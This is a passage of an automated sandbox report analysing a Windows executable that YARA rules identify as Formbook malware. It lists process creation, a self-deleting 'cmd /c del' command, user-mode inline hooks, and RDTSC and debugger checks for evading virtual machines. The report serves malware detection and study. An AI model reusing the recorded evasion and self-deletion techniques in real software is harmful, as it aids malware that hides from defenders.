          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_002B19694_2_002B1969
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_002B65504_2_002B6550
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_002A71904_2_002A7190
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_002C31DC4_2_002C31DC
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_002A52264_2_002A5226
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_002AFA304_2_002AFA30
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_002A5E704_2_002A5E70
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_002A8AD74_2_002A8AD7
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_002ACB484_2_002ACB48
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_002C6FF04_2_002C6FF0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_002B5FC84_2_002B5FC8
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03062B284_2_03062B28
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_0305DBD24_2_0305DBD2
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_030503DA4_2_030503DA
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_0304FA2B4_2_0304FA2B
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FCEBB04_2_02FCEBB0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_030622AE4_2_030622AE
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FBAB404_2_02FBAB40
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FC20A04_2_02FC20A0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FAB0904_2_02FAB090
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_030510024_2_03051002
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_0306E8244_2_0306E824
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_030620A84_2_030620A8
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FB41204_2_02FB4120
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_030628EC4_2_030628EC
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02F9F9004_2_02F9F900
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_0306DFCE4_2_0306DFCE
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FB6E304_2_02FB6E30
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03061FF14_2_03061FF1
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_0305D6164_2_0305D616
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03062EF74_2_03062EF7
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03062D074_2_03062D07
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03061D554_2_03061D55
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_030625DD4_2_030625DD
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FA841F4_2_02FA841F
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FAD5E04_2_02FAD5E0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_0305D4664_2_0305D466
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FC25814_2_02FC2581
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02F90D204_2_02F90D20
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: String function: 00D86E91 appears 84 times
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: String function: 00D86EA6 appears 36 times
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: String function: 00D86FC1 appears 40 times
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: String function: 00D89100 appears 64 times
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: String function: 014FB150 appears 35 times
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: String function: 00D870FC appears 370 times
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: String function: 00D8BF63 appears 38 times
          Source: C:\Windows\SysWOW64\cmd.exeCode function: String function: 02F9B150 appears 45 times
          Source: RRW9901200241.exe, 00000000.00000002.341417567.0000000000FF0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemsvfw32.dll.muij% vs RRW9901200241.exe
          Source: RRW9901200241.exe, 00000000.00000003.337793378.000000001B18F000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs RRW9901200241.exe
          Source: RRW9901200241.exe, 00000002.00000003.381525500.0000000001081000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs RRW9901200241.exe
          Source: RRW9901200241.exe, 00000002.00000002.384345094.00000000015EF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs RRW9901200241.exe
          Source: RRW9901200241.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 00000002.00000002.383682726.0000000001030000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.383682726.0000000001030000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.341808975.0000000001A00000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.341808975.0000000001A00000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.677144358.0000000000370000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.677144358.0000000000370000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.677857555.00000000027D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.677857555.00000000027D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.382481853.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.382481853.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.383234162.0000000001000000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.383234162.0000000001000000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.RRW9901200241.exe.1a00000.2.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.RRW9901200241.exe.1a00000.2.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.RRW9901200241.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.RRW9901200241.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.RRW9901200241.exe.1a00000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.RRW9901200241.exe.1a00000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.RRW9901200241.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.RRW9901200241.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/0@6/4
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_002AC5CA _get_osfhandle,GetConsoleScreenBufferInfo,WriteConsoleW,GetLastError,GetLastError,FormatMessageW,GetConsoleScreenBufferInfo,WriteConsoleW,GetStdHandle,FlushConsoleInputBuffer,GetConsoleMode,SetConsoleMode,_getch,SetConsoleMode,GetConsoleScreenBufferInfo,FillConsoleOutputCharacterW,SetConsoleCursorPosition,EnterCriticalSection,LeaveCriticalSection,exit,4_2_002AC5CA
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_002CA0D2 memset,GetDiskFreeSpaceExW,??_V@YAXPAX@Z,4_2_002CA0D2
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6536:120:WilError_01
          Source: C:\Users\user\Desktop\RRW9901200241.exeCommand line argument: Kernel32.dll0_2_00D81000
          Source: C:\Users\user\Desktop\RRW9901200241.exeCommand line argument: User32.dll0_2_00D81000
          Source: C:\Users\user\Desktop\RRW9901200241.exeCommand line argument: User32.dll0_2_00D81000
          Source: C:\Users\user\Desktop\RRW9901200241.exeCommand line argument: IEUCIZEO0_2_00D81000
          Source: C:\Users\user\Desktop\RRW9901200241.exeCommand line argument: Kernel32.dll2_2_00D81000
          Source: C:\Users\user\Desktop\RRW9901200241.exeCommand line argument: User32.dll2_2_00D81000
          Source: C:\Users\user\Desktop\RRW9901200241.exeCommand line argument: User32.dll2_2_00D81000
          Source: C:\Users\user\Desktop\RRW9901200241.exeCommand line argument: IEUCIZEO2_2_00D81000
          Source: RRW9901200241.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\RRW9901200241.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: RRW9901200241.exeReversingLabs: Detection: 34%
          Source: C:\Users\user\Desktop\RRW9901200241.exeFile read: C:\Users\user\Desktop\RRW9901200241.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\RRW9901200241.exe 'C:\Users\user\Desktop\RRW9901200241.exe'
          Source: unknownProcess created: C:\Users\user\Desktop\RRW9901200241.exe 'C:\Users\user\Desktop\RRW9901200241.exe'
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\RRW9901200241.exe'
          Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\RRW9901200241.exeProcess created: C:\Users\user\Desktop\RRW9901200241.exe 'C:\Users\user\Desktop\RRW9901200241.exe' Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\RRW9901200241.exe'Jump to behavior
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32Jump to behavior
          Source: RRW9901200241.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000003.00000000.363251700.0000000007CA0000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: RRW9901200241.exe, 00000000.00000003.337251978.000000001B070000.00000004.00000001.sdmp, RRW9901200241.exe, 00000002.00000002.384345094.00000000015EF000.00000040.00000001.sdmp, cmd.exe, 00000004.00000002.678905716.000000000308F000.00000040.00000001.sdmp
          Source: Binary string: cmd.pdbUGP source: RRW9901200241.exe, 00000002.00000003.381525500.0000000001081000.00000004.00000001.sdmp, cmd.exe, 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: RRW9901200241.exe, cmd.exe
          Source: Binary string: cmd.pdb source: RRW9901200241.exe, 00000002.00000003.381525500.0000000001081000.00000004.00000001.sdmp, cmd.exe
          Source: Binary string: wscui.pdb source: explorer.exe, 00000003.00000000.363251700.0000000007CA0000.00000002.00000001.sdmp
          Source: RRW9901200241.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
          Source: RRW9901200241.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
          Source: RRW9901200241.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
          Source: RRW9901200241.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
          Source: RRW9901200241.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 0_2_00D91AB3 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00D91AB3
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 0_2_00D89145 push ecx; ret 0_2_00D89158
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 0_2_012FFC06 pushad ; retf 0_2_012FFC25
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0041E3CF push ds; ret 2_2_0041E3D3
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_00417CE0 push 403FCDEBh; iretd 2_2_00417D3A
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_00417CB6 push 403FCDEBh; iretd 2_2_00417D3A
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0041CEF2 push eax; ret 2_2_0041CEF8
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0041CEFB push eax; ret 2_2_0041CF62
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0041CEA5 push eax; ret 2_2_0041CEF8
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0041CF5C push eax; ret 2_2_0041CF62
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_00414F86 push edi; ret 2_2_00414F88
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_00D89145 push ecx; ret 2_2_00D89158
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0154D0D1 push ecx; ret 2_2_0154D0E4
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_002B76BD push ecx; ret 4_2_002B76D0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_002B76D1 push ecx; ret 4_2_002B76E4
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FED0D1 push ecx; ret 4_2_02FED0E4

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8E 0xEE 0xE5
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\RRW9901200241.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\RRW9901200241.exeRDTSC instruction interceptor: First address: 0000000000409B4E second address: 0000000000409B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmd.exeRDTSC instruction interceptor: First address: 00000000027D98E4 second address: 00000000027D98EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmd.exeRDTSC instruction interceptor: First address: 00000000027D9B4E second address: 00000000027D9B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_00409A80 rdtsc 2_2_00409A80
          Source: C:\Windows\explorer.exe TID: 1040Thread sleep count: 49 > 30Jump to behavior
          Source: C:\Windows\explorer.exe TID: 1040Thread sleep time: -98000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exe TID: 4868Thread sleep time: -100000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_002B245C FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove,4_2_002B245C
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_002B68BA FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,4_2_002B68BA
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_002AB89C GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose,4_2_002AB89C
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_002A85EA memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,4_2_002A85EA
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_002C31DC FindFirstFileW,FindNextFileW,FindClose,4_2_002C31DC
          Source: explorer.exe, 00000003.00000000.364943349.0000000008430000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000003.00000000.364891332.00000000083E8000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 00000003.00000000.368126601.0000000008662000.00000004.00000001.sdmpBinary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000002.690932206.0000000005D50000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000003.00000000.357665667.00000000062E0000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000000.364891332.00000000083E8000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000003.00000000.357665667.00000000062E0000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000002.691817008.00000000062E0000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllte
          Source: explorer.exe, 00000003.00000000.364593921.00000000082E2000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
          Source: explorer.exe, 00000003.00000002.690932206.0000000005D50000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000003.00000002.690932206.0000000005D50000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000003.00000000.364593921.00000000082E2000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: explorer.exe, 00000003.00000000.364943349.0000000008430000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
          Source: explorer.exe, 00000003.00000002.690932206.0000000005D50000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: explorer.exe, 00000003.00000000.346593091.000000000095C000.00000004.00000020.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
          Source: C:\Users\user\Desktop\RRW9901200241.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\RRW9901200241.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_00409A80 rdtsc 2_2_00409A80
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0040ACC0 LdrLoadDll,2_2_0040ACC0
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 0_2_00D889BC _memset,IsDebuggerPresent,0_2_00D889BC
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 0_2_00D91AB3 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00D91AB3
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 0_2_00D91AB3 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00D91AB3
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 0_2_00D869A0 mov eax, dword ptr fs:[00000030h]0_2_00D869A0
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 0_2_012FED06 mov eax, dword ptr fs:[00000030h]0_2_012FED06
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 0_2_012FF575 mov eax, dword ptr fs:[00000030h]0_2_012FF575
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 0_2_012FF5B2 mov eax, dword ptr fs:[00000030h]0_2_012FF5B2
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 0_2_012FF75D mov eax, dword ptr fs:[00000030h]0_2_012FF75D
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 0_2_012FF615 mov eax, dword ptr fs:[00000030h]0_2_012FF615
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_00D869A0 mov eax, dword ptr fs:[00000030h]2_2_00D869A0
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0151B944 mov eax, dword ptr fs:[00000030h]2_2_0151B944
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0151B944 mov eax, dword ptr fs:[00000030h]2_2_0151B944
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_014FC962 mov eax, dword ptr fs:[00000030h]2_2_014FC962
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_014FB171 mov eax, dword ptr fs:[00000030h]2_2_014FB171
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_014FB171 mov eax, dword ptr fs:[00000030h]2_2_014FB171
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_014F9100 mov eax, dword ptr fs:[00000030h]2_2_014F9100
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_014F9100 mov eax, dword ptr fs:[00000030h]2_2_014F9100
